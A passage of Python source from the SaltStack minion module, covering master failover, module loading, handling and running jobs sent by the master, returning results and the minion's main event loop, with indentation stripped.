'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
# store your hexid to subscribe to zmq, hash since zmq filters are prefix
# matches this way we can avoid collisions
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns the current master address. In standard mode, just calls
authenticate() with the given master address.
With master_type=func evaluates the current master address from the given
module and then calls authenticate().
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to connect is used to authenticate() and
then returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in self.opts:
self.opts['master_list'] = local_masters
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
return opts['master']
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
self.connected = False
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
self.connected = True
return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data)
self.handle_event(event)
self.epub_sock.send(event)
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
if self.opts.get('multimaster', False):
s_opts = copy.copy(self.opts)
functions = salt.loader.minion_mods(s_opts, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
functions.clear()
returners.clear()
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None:
return
if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(data['tgt'], delimiter=delimiter):
return
elif not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
# If we are running in multi-master mode, re-inject opts into module funcs
if instance.opts.get('multimaster', False):
for func in instance.functions:
sys.modules[instance.functions[func].__module__].__opts__ = self.opts
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info.').format(function_name, exc)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_monitor_socket(self):
if not HAS_ZMQ_MONITOR or not self.opts['zmq_monitor']:
return
self.monitor_socket = self.socket.get_monitor_socket()
t = threading.Thread(target=self._socket_monitor, args=(self.monitor_socket,))
t.start()
def _socket_monitor(self, monitor):
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
while monitor.poll():
evt = zmq.utils.monitor.recv_monitor_message(monitor)
evt.update({'description': event_map[evt['event']]})
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
break
monitor.close()
log.trace("event monitor thread done!")
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.SAuth(self.opts)
auth.authenticate()
# TODO: remove these and just use a local reference to auth??
self.tok = auth.gen_token('salt')
self.crypticle = auth.crypticle
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = auth.creds['publish_port']
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.socket
del self.context
del self.poller
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _windows_thread_cleanup(self):
'''
Cleanup Windows threads
'''
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self._set_monitor_socket()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
self._windows_thread_cleanup()
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
self._do_event_poll(socks)
self._process_beacons()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_event_poll(self, socks):
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
